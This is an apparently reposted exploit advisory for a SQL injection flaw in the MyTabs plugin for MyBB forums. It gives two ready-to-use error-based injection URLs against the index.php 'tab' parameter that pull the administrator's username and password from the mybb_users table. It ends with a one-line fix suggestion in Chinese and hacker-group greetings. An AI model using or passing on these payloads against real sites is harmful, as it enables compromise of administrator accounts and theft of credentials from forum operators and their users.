MyBB 0day \ MyTabs (插件) SQL注射缺陷及修复 - 网站安

# Exploit title :  MyBB 0day \ MyTabs (plugin) SQL injection vulnerability. # Author: AutoRUN & dR.sqL # Vulnerable Software Link : http://mods.mybb.com/view/mytabs   Vulnerability :   $~ http://www.2cto.com /mybbpath/index.php?tab=[SQLi]   --------------------------------------- #           ~ Expl0itation ~            # ---------------------------------------   $~ Get the administrator's username (usually it has uid=1) ~   http://www.2cto.com /mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -   $~ Get the administrator's password ~   http://www.2cto.com /mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -          _         _        ____  _   _ _   _                   _       _ ____              _   

修复：对index.php页面tab参数输入过滤

# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends.

查看更多关于MyBB 0day \ MyTabs (插件) SQL注射缺陷及修复 - 网站安的详细内容...